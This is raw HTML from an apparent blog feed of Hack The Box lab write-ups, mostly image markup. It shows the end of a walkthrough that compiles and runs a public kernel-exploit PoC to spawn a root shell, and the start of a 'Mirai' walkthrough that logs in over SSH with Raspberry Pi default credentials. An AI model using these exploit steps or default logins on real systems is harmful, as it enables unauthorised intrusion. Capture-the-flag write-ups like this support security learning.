></span> <img class="gatsby-resp-image-image" alt="wget" title="" src="/static/f4e62f8128f9fd1522159f8d722d7ae1/50637/wget-exploit.png" srcset="/static/f4e62f8128f9fd1522159f8d722d7ae1/dda05/wget-exploit.png 158w, /static/f4e62f8128f9fd1522159f8d722d7ae1/679a3/wget-exploit.png 315w, /static/f4e62f8128f9fd1522159f8d722d7ae1/50637/wget-exploit.png 630w, /static/f4e62f8128f9fd1522159f8d722d7ae1/f2f9b/wget-exploit.png 744w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 428px; " > <a class="gatsby-resp-image-link" href="/static/ecb34dea084f01c2fc9dab5b4eeab0a4/ce704/tar-xjvf.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.0379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABoUlEQVR42n2R+ZKaQBjEeZRd1FU5lIjcjsgAiiAQNak9klTl/V+it4fdZI9U5Y+unqmZ+dH9oTnHHsuKKk9wZA1bVnC8AmFcwFzE0M0QIyvGyPRxZ4cY0yd0fb7GyPA+SJ1pMkix9wRSqnYipG4CuUhQOTGE5WEadjCz31gGBYr6iiRrIIoWS28H2xWYOwksdwuDrqCae3mAd33Cqr3C6+7hNhdMnRROkBMisfAlVnGJJd3b7BGICi730a6Gz70b5fQDHD9jagJFesKhecAmbdD0PyGLMx8emCDDzXSNW166mdFn3qvWQ93bmUt3h7U+e/GhcpJ3yI7fEWcn7NtHpPsLdYYov2LDs6kdYf5F4I7zHHM9sjhHamIF/2gAirxH2dxjI0+o+h/IDhfOSMF6SH5I1fG3NUcgB6hu+PxB6vEf+R+kJbIbHiYqYfc4pEuZLiRkFZYwmU6fE2IEA+izPoM1UfQEPTFhi/r8C/nxG3bUlnXt9W6ATazoBWj8D/haORBHJKynqqn5CYJUxXjXIMraIalqEfLe36TvwVyPjTfgMxh1KNXiipy4AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="extract" title="" src="/static/ecb34dea084f01c2fc9dab5b4eeab0a4/ce704/tar-xjvf.png" srcset="/static/ecb34dea084f01c2fc9dab5b4eeab0a4/dda05/tar-xjvf.png 158w, /static/ecb34dea084f01c2fc9dab5b4eeab0a4/679a3/tar-xjvf.png 315w, /static/ecb34dea084f01c2fc9dab5b4eeab0a4/ce704/tar-xjvf.png 428w" sizes="(max-width: 428px) 100vw, 428px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As stated on the PoC GitHub page, the exploit takes three steps. First, the <code class="language-text">make</code> command to compile the code:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f6c8a2cc2c3f905759950a4e13d3ebbc/62586/make.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 91.77215189873418%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAASCAYAAABb0P4QAAAACXBIWXMAAAsTAAALEwEAmpwYAAADKklEQVR42oVU2XLTQBDUlwCJT52r1W1dlmX5TOI4waEo4P9/o+lZGyiqQvHQtauVNNM907OWs3uGd/4Cb3eC3zxDdV/h1m8oNxd4cYM7r4GjG/hJi2lQYewTToqxm72DFNbi8BnZ4RXx+hHJ6hXZ5huK/Q9szj+wPl7gFwdEiwFJtYFebOGmA7yogR1W7wa1hocvaIZnrPYXNPUr6vIF/XBB11+w3Jyh8w5hvoIihKXmGuY990vookeQdnCZQGWdSWIFmbxcIcjWKNoHshgQqT202mEa1Zh65T/kvQ/r0yzBxFvg3s7wYRIZjJwCc3+JccRgusSMtZzHNSZ+cfsx/3fAZjij6k8GdXlGW11QDy/Ilgdk+RFJeqTMAWG2MrVTXEWeF7es7fq3ZCnLVXLSGckekdZ7ZM0BRfYEP5WzDRyPTN3CsJp4+f8lfxz5uJ9r3M0TfJzF+MD91GlojRL3iqUIFhirChNNyWGNMZ9HtI3g3k5u4LN7hdVv6bnqgKoms/SEtryg6B7hRC0lLuHHHZywMXtHt1Bk7ss73fxVAtfjd24LS+kBOtohCum1cIeF/xmaUhW778UMyJKIsV0GlOZN/ZKd5+oVBjNfzghngQlLY4UZA+ZbZl7DcZgtPtBz6ysrsnPJyg6vAYVhkPbmnauvkB4oaQwnymaprFD1iPUWSfCIKnxDph/hqdUfNswu+8lt//ssIENirkom5BnZCUtLUZaix3xBsIYtmcxoNUay1PIXQ5f7ML9+49lc7RaOzXPCo7q5Q9tEye4qjQVVNiXzR32TLGxmvBCurK6w2emJy3OHU0QnCGY3TDkQVsSBL1oauNhjUT6g7p+Q0Y+BdJP1kVU6PGdgSSzNknENizVr3Ztn6XKQyjclrKzao+5OKGmVsjuiXT8hr3dIq50xeVyyvtwLciYS84uVpBkyLZJQmqP4PKdHrbh7QLxisO0LkpZ3Yn7AiE2Z6xXllqYhIlvWsVeZ5pjZp7w7JzcDIca+41CYgO7xBfr0Zi5Yu3nl5fodo+or6sN3ZNWWdauMeWeq4eQMbFKPiDWehR1GQWcmZuxkGDGoq2v8BI2ARfc1zzvKAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="make" title="" src="/static/f6c8a2cc2c3f905759950a4e13d3ebbc/50637/make.png" srcset="/static/f6c8a2cc2c3f905759950a4e13d3ebbc/dda05/make.png 158w, /static/f6c8a2cc2c3f905759950a4e13d3ebbc/679a3/make.png 315w, /static/f6c8a2cc2c3f905759950a4e13d3ebbc/50637/make.png 630w, /static/f6c8a2cc2c3f905759950a4e13d3ebbc/62586/make.png 777w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I ran <code class="language-text">./fuse ./ovlcap/lower ./gc</code> from one terminal:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 495px; " > <a class="gatsby-resp-image-link" href="/static/fea56a60043dc31d8276aa18b376c5f4/c15e7/run-exp-1.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 6.962025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAU0lEQVR42g3H3QpAMACAUe8i0vxtFkJtjbWQiGvv/xof5+5Epdlo9ge53qhwofxBPZ1o/5L1F7HaSboHoR11N1NoS95YZO//L+gxIJShah1pOfABUGEhkYbbAjEAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="run first part" title="" src="/static/fea56a60043dc31d8276aa18b376c5f4/c15e7/run-exp-1.png" srcset="/static/fea56a60043dc31d8276aa18b376c5f4/dda05/run-exp-1.png 158w, /static/fea56a60043dc31d8276aa18b376c5f4/679a3/run-exp-1.png 315w, /static/fea56a60043dc31d8276aa18b376c5f4/c15e7/run-exp-1.png 495w" sizes="(max-width: 495px) 100vw, 495px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I opened another terminal on the target machine and ran <code class="language-text">./exp</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 373px; " > <a class="gatsby-resp-image-link" href="/static/07a0bf380b1500e5a37a7905adb8bff0/18115/run-exp-2.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 11.39240506329114%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAACCAYAAABYBvyLAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAjElEQVR42j3MTQqCQABA4a5SlDmjVhTqOGXlX0oOhSRiQdENuv/q5SJafLzdG9k6R1ZXZGGQuUEkNSI9I4KMTViy9hNCXeKrAqUrom2JPhiO6QVLKsaWz8wOmf6MRGZYPF547X3Q49Q33KbDiytk0CHjN87uiTPUjXqWpw9R0hKonH3W4K1iJvPgP/wCSIxD1u+QxA0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="run second part" title="" src="/static/07a0bf380b1500e5a37a7905adb8bff0/18115/run-exp-2.png" srcset="/static/07a0bf380b1500e5a37a7905adb8bff0/dda05/run-exp-2.png 158w, /static/07a0bf380b1500e5a37a7905adb8bff0/679a3/run-exp-2.png 315w, /static/07a0bf380b1500e5a37a7905adb8bff0/18115/run-exp-2.png 373w" sizes="(max-width: 373px) 100vw, 373px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After doing so, a root shell was spawned:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; " > <a class="gatsby-resp-image-link" href="/static/a51ec523792f6355026d5801a217f9a7/27330/root.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABnklEQVR42n2S63KbMBCFeRUXg21sMEhI4mZzNdixY7s0mbpNJv/6/o9wuiihnWaS/jizjGb59uyRDHW9If32DN6ekR1ucNQDpvwKi7RQj/CCAkzWmM4lSX2gSMt8kxHHHZJ0D8ZLqLjFfCkxMX1MZyFMK8DECjGZ8v8A1b/AbXWBIJDjZbraTgSZ7HXjmlWIsgO4auCHNXjUYuGmMGfv4Iu/Lo2me0B7eESoduiO3zWgqL+CESDa3KFqe6j0AJ9XSPN7iKjDys81dNQXe6jqFZjlJ2zLMzbFPapdj3RzREQRSHKryKnHCgRhRZAtZdnApUw9VpL7Qg8ZnItkGFJol4bH8refSt2wXOfU1ICJBlzuMFvGOoZhNYtWs6jaTkznyR8t3EyfaaBfHeGXR3jJDp68w1JcMBdXOLJHkPa0Yq1zW/kb7cwNcj1kzHFce8zTiH68ILq9QJx68PoJQfULvHiGl/2ErJ6QZntkFMcQQSBeL2e++uBiRiCrT1hvO9jJBTY/gydXuu29zsodwqdnY9qCgqfnY3FM6Psz2AD8DXqYI3FBiSAaAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="root shell" title="" src="/static/a51ec523792f6355026d5801a217f9a7/27330/root.png" srcset="/static/a51ec523792f6355026d5801a217f9a7/dda05/root.png 158w, /static/a51ec523792f6355026d5801a217f9a7/679a3/root.png 315w, /static/a51ec523792f6355026d5801a217f9a7/27330/root.png 590w" sizes="(max-width: 590px) 100vw, 590px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>https://mgarrity.com/hack-the-box-mirai/https://mgarrity.com/hack-the-box-mirai/Mon, 10 Apr 2023 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b0451e3ba9d0c811102fb3084c27d59e/3b67f/mirai.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/0lEQVR42mMQkdX+jxPLaf8XltH+LygBpKF8vOqBmAGXhKgcyCAtIK3zX0Zb/b8YkC8gQdhQBpyGSWr9VzPV/x9dbfm/fk78/8g6x/+qxrpAcYg8SQYKy2j9l1LS/2+fov4/tdvs/+ODc/6Hthn8d8vW+i+hoAf0vhYJBkK9qmxg8D+gQP1/w5yo/9eOLPuf3OL03ytL9b+yviHY9bhciSMMdf6LyGv9jytz+n/58pn/3z7//b9j+6b/AVmm/0UVdMgNQ+3/8vra/ws7o/7P39D1P6s5+L+igQ55YYhsKL+kyn8xFaX/AlJqYK+SFcvIhorJ6wLZukBaB6/LYAYCALuqC4UAwdjRAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="mirai" title="" src="/static/b0451e3ba9d0c811102fb3084c27d59e/50637/mirai.png" srcset="/static/b0451e3ba9d0c811102fb3084c27d59e/dda05/mirai.png 158w, /static/b0451e3ba9d0c811102fb3084c27d59e/679a3/mirai.png 315w, /static/b0451e3ba9d0c811102fb3084c27d59e/50637/mirai.png 630w, /static/b0451e3ba9d0c811102fb3084c27d59e/fddb0/mirai.png 945w, /static/b0451e3ba9d0c811102fb3084c27d59e/3b67f/mirai.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Mirai features a Raspberry Pi device with default credentials that can be used to log in over SSH. Enumeration of the machine reveals a USB block device that is located on the <code class="language-text">sdb</code> disk, but the files have been deleted off of the USB. The <code class="language-text">strings</code> utility can be used to view contents of files that have yet to be overwritten and still remain on the disk which leads to the root flag.</p> <p>The initial visit to the IP just showed a blank page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/530db0a369a9ca4856fce8e2c34e1230/e4a89/initial-ip-visit.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAAxklEQVR42q2O22rCUBBFz2/Y5obGnEQEUfFFKFaLRdo+9bOkiHpuibWFfmhYHm/QD8jAYm8WwzDiZfnO28cnz4sVs/mKp9kr7U5BGHWJkozHsHMlSm89/dfvPiWIroi8N2IwnFL0J+RyQOZJ5QjZGyOLIXHij8eFX5Y+JUGcE4QZ4dknN+958K4VdBHGVGj7i3JHqp3BmRJV/aHdD1o7DvaAcd8oZbHGXbrea6xPWx4xylF6NlvN+muLoOERdV3TJM1/2PTBE4h6r498KTp6AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="initial ip visit" title="" src="/static/530db0a369a9ca4856fce8e2c34e1230/50637/initial-ip-visit.png" srcset="/static/530db0a369a9ca4856fce8e2c34e1230/dda05/initial-ip-visit.png 158w, /static/530db0a369a9ca4856fce8e2c34e1230/679a3/initial-ip-visit.png 315w, /static/530db0a369a9ca4856fce8e2c34e1230/50637/initial-ip-visit.png 630w, /static/530db0a369a9ca4856fce8e2c34e1230/e4a89/initial-ip-visit.png 928w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I ran a scan with <code class="language-text">nmap</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2bb2f55caecbaa611035d07c735448dd/2059a/nmap.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 49.36708860759494%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABxElEQVR42nWSaXKbQBSEuUjKSrRYEkiAWIZ9HUC7LCeqlO9/kE7PxFaUlPOjaxiqaL7u94yZLzFLbpiJE0whkbRnNLsbhtMbMnnBxIwwW8VUctfUijA2hdbkrlDLSJsLkvqIQp4RlQf42QBR7CHyPeygwdLNsfJrWF5JVTA3JZ7XKb4twk9NjUK+IK4OyHnW2++o+ivk/gY7bGlUYR3UWop0asX6VBovxR89GBte1CEhmUgHWG6m5cctLCclIc1I54jf5opUES7d4m/DB1NjYWeoOlKRbjj+RL/7gaZ7QdNf0G+vKOq97nTpZBg9+zqqjvuv4bup4ZAiq0/ImzMqDiEp9zzPyModqXvYXsE+d5pOffRp5Ae9Rz5iEzYw7RRrFu+yv/mKxc8FniYbfBkt8TReYzR18XVGzf3/G2bVCXX3ioLTLuUrSa/oDm/I2yui4sAuE/ZY8kclTE7ctGMsVoy8CBhd3Cv4qMFw/BZuIOGFKh6fQ8lhtJSEowYSkDjq4SUDHEXOzudr7uLc01P/2E21SupuiHSHIB4YuUOQsLfsAI93L97C56IHsaRhx3uPMOM7boPaTUVrbXK9UmoDbFamfvYL8EVFfGJkWHMAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="nmap scan" title="" src="/static/2bb2f55caecbaa611035d07c735448dd/50637/nmap.png" srcset="/static/2bb2f55caecbaa611035d07c735448dd/dda05/nmap.png 158w, /static/2bb2f55caecbaa611035d07c735448dd/679a3/nmap.png 315w, /static/2bb2f55caecbaa611035d07c735448dd/50637/nmap.png 630w, /static/2bb2f55caecbaa611035d07c735448dd/2059a/nmap.png 767w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Open ports:</p> <ul> <li>22 (SSH)</li> <li>53 (DNS)</li> <li>80 (HTTP)</li> </ul> <p>Since port 53 was open, I tried adding <code class="language-text">mirai.htb</code> to my <code class="language-text">/etc/hosts</code> file which is the typical naming convention for virtual hosts on HTB. Then, I visited the page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/441f16a6d52e91894106d5d56dc9b5da/cfb3a/visit-virtual-host.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 33.54430379746836%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABZUlEQVR42pWQS0/CQBSF+z9QFKHFhVCKUVATQ4yPmKhx4580MYJUXi3FX8AGQliopSUB2vAoFApsOE6nMSo7b/LlnHty52ZmmIurW9zdP+D88gaps2scJk+xFeAIYfj8LHybIQ9/6MevsUHmvmH4eBL7iRT4+BEE/gC8kEBEOEFUOEaYi4ENxxDieATZCNhdASwbpX2I5BxRlhAIRrC9s0dhMk95ZNISXp4LEB9FZNMFZF8VSOUKFElBWa5AcikWoShvVGWZ5MTLRQlSSUYuX4KYzUEU82B6HzZMbQJDnaDzPoap2hgbDmit8O9itLaK4XCA/qCP4WiI0cjVPkyzB9u2sZjP4TgO5kRdnJnn3Ww2m3lKoLOLBZhqtYFms4larYZGo0FooV5XSfYJTWsRNLTbbUqr5fW6rsMwTbpkOp1SLGvkLdT1AbrdDgzDQKfTJVjkkEVuOMFyucBqtfoD/Ylffv3JX//CrI53foUxAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visit virtual host" title="" src="/static/441f16a6d52e91894106d5d56dc9b5da/50637/visit-virtual-host.png" srcset="/static/441f16a6d52e91894106d5d56dc9b5da/dda05/visit-virtual-host.png 158w, /static/441f16a6d52e91894106d5d56dc9b5da/679a3/visit-virtual-host.png 315w, /static/441f16a6d52e91894106d5d56dc9b5da/50637/visit-virtual-host.png 630w, /static/441f16a6d52e91894106d5d56dc9b5da/fddb0/visit-virtual-host.png 945w, /static/441f16a6d52e91894106d5d56dc9b5da/cfb3a/visit-virtual-host.png 979w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Access to <code class="language-text">mirai.htb</code> was blocked, however, the page was generated with Pi-hole which is a network-level ad blocker that runs on a Raspberry Pi. By default, the admin interface for Pi-hole is located at <code class="language-text">/admin</code>, visiting that page showed the dashboard:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ef87b4df16025f6be0f340cfa09fae1a/81753/admin-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 53.79746835443038%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAACYElEQVR42o3RW0jTURzA8T300GvQW3c0Lc1pWBCEPVT00lNExd6iICjoOaSSHhIju7hpbs5rachU5ua8Tedam9t00wmzMt2mOCnvbt7mNqNv29+QMoUePpwD5/DlxzmiDqudzLs5ZN1/RsatHCRlRiQNg1ytdXGzboA7KjM33uu5VqPnnuojj2rbya7WkF3TGGPiQbmBhyU6HiubcbiHEHW1tnAh9QjirLOkpaRxsc7C7r51RM1+znd/Q2LOZ1etBFHpFXKNeaA9R7B0L/43e5iqecrk7ev4JJdwSS7j/fIZUXtHJ0niTBLFJzmYkERuq4XKIBSOh9DNRNB+d6EYNVHkNdE/6QZfHdHhalaHawmNDLDUqmOxRcNURxue4WFEekMXyZlnSIhF9yWfwGbv4WtfL4YmNeZOPTZTN06znT6LnW6zFYO1H6PNhbHHhcnpwDLopvuTm6HxccZGxzYmPJpxmsT0U+xPTsNi7+V9vYonebm8kL3mZcyrIikF8kKKlMUoyhSUViiprCynqqqCd2+rKCtV0mUw4Pf7EbXp9RxKSRcmjAdtvU4cTicN6kaadM1om3Ro4rRNgkaNVqAWaIS9qr4ei9UWC07Egx0cTs0QggeOizFZbNSp1TyXypDKFUiL5TtQCGTyEvILZLQbjExMbA0eS8MYe6uV1QiT0/NMzwb+2+z8Ih6v99+gIfYB4R8wFwyxsBTewdoWYWYDK4x4PBuf8mewKxYMRWFmYVm4tJ254Opvoc01ft/j2WbCDzYH6z8hEFwiFI4Qjq7/ZS0SFc6Ci8ssBBY393E+n49fwICZ8Yyx0JwAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="admin page" title="" src="/static/ef87b4df16025f6be0f340cfa09fae1a/50637/admin-page.png" srcset="/static/ef87b4df16025f6be0f340cfa09fae1a/dda05/admin-page.png 158w, /static/ef87b4df16025f6be0f340cfa09fae1a/679a3/admin-page.png 315w, /static/ef87b4df16025f6be0f340cfa09fae1a/50637/admin-page.png 630w, /static/ef87b4df16025f6be0f340cfa09fae1a/fddb0/admin-page.png 945w, /static/ef87b4df16025f6be0f340cfa09fae1a/f46b1/admin-page.png 1260w, /static/ef87b4df16025f6be0f340cfa09fae1a/81753/admin-page.png 1396w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I tried logging in with default credentials but they didn't work. So, the next move was to try to login over SSH.</p> <p>Since the system was using a Raspberry Pi, I assumed that it was running the most common OS for Raspberry Pis, Raspberry Pi OS. Therefore, I attempted to log in over SSH using the default credentials:</p> <p>username: <code class="language-text">pi</code></p> <p>password: <code class="language-text">raspberry</code></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4baa97343feb045216d3ec0812a17e41/2059a/ssh-login.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 58.86075949367089%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAACFElEQVR42lVSV5bbMAzUTTZZx2q2ZBVSVG/u9m7KR5L7n2QyoBKv8zEPhEQOMAM4nj5h2/1GPv6C6m7YX3+int7RHb4jq474sinhxQ3cqMJ6WxKMUQ1v1/BssAo17xQPOGZ4Q0OCaryhmd9h+hvS8sj8zZ7L4Y6iuz7igguq6c2ew7T5j9Rp5q+o+VgIpCvprubldv8N9h9z3V6gmhPy+mRJMhbMygO2aoQb1yQ0JDMLYTncUA0fnQhJKpfzAZGaGEfsihmxnmwUyHchj4SQVqw2T4S6OaOj1IKxHq4w7RlVf10gXR9/oOzvtitVn22xxOwRsdCaZK9BYQn/wUmLPRI9ExOirEecDUj1iJyI6Y8QKBbzdy18DidMe3u2ROFfovCJsBSZlGvok5XODnXFIqpHlNTspIfivx0Lu5yukHn0TQgt/CV+9rUFJV+Qcz1MI0Q0mx4VlKZrTra7Q5UzckMFxUgVox2GSF4GdbarJSu0obINFTpBxH1iFX/L3dq2cC0ayuuYc+8CBZdS1mHBqOGFyn73k44d8x7JpOMgaRGweydKB3o1UeKB/nGqGaeqD5TKqebdY9LSgcRIDQgjg5hWxHq2kxYP7cITTmaO9nFqTpR1IplMkOuhZku4PJJCLMyYGBZWi3zJZZ3CtLNRcsflwaUnK3YWZEdL9rJWePUKvKxifPIyml0sCPTD/Gc8hhIU+AN1Y4aF02igKgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="ssh login" title="" src="/static/4baa97343feb045216d3ec0812a17e41/50637/ssh-login.png" srcset="/static/4baa97343feb045216d3ec0812a17e41/dda05/ssh-login.png 158w, /static/4baa97343feb045216d3ec0812a17e41/679a3/ssh-login.png 315w, /static/4baa97343feb045216d3ec0812a17e41/50637/ssh-login.png 630w, /static/4baa97343feb045216d3ec0812a17e41/2059a/ssh-login.png 767w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The default creds worked, which provided the initial foothold. Looking around the system led to the user flag which can be found in the <code class="language-text">~/Desktop</code> directory:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6fd218aa0c53598cae8f0041d9fedf61/620ce/user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.050632911392405%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABI0lEQVR42i2Q226CYBCEfZOKB6oC/gg/Z6ooiAei9RTTNk162fd/gq+L9mKS2dnN7Ox24sONYHfCXzTk5RkvLvHTNTrboNMNbrSSusZPKulVuOESL62Yia6zGi8pCbI1SvSRSulE5YVkfUXPD+jFGTeucZMds7gdKoVvUfGWWaule6ZRjRKukvqx2I3aABVjN2NghXSmxQ92uMfUR4bFL1b+gRnfeVFbus6KXnDFUDWGf8JIvoVXGE6JYc/pvvoY4wBjpOlPgqehffnEu94Z5w3D5As7vzHVbfw3TCejPw4FMjwJ6f3zB6QeWDF9O2Jgx8Kjp6EuGoJVI3+Rf2Xvct6OKN/gVQes5Q4zLRnqmu6sQWVHHF1IIjGeiNkkesJ6ojX9A4wHpCol2JpXAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="user flag" title="" src="/static/6fd218aa0c53598cae8f0041d9fedf61/50637/user-flag.png" srcset="/static/6fd218aa0c53598cae8f0041d9fedf61/dda05/user-flag.png 158w, /static/6fd218aa0c53598cae8f0041d9fedf61/679a3/user-flag.png 315w, /static/6fd218aa0c53598cae8f0041d9fedf61/50637/user-flag.png 630w, /static/6fd218aa0c53598cae8f0041d9fedf61/620ce/user-flag.png 774w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I got permission denied when I tried to <code class="language-text">cd</code> into <code class="language-text">/root</code>, so next I checked what permissions the <code class="language-text">pi</code> user was able to run with <code class="language-text">sudo</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/71cbab6e140336cd64e7ffb014df3c1e/ad007/sudo-l.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.278481012658226%; position: relative; bottom: 0; left: 0; background-image: 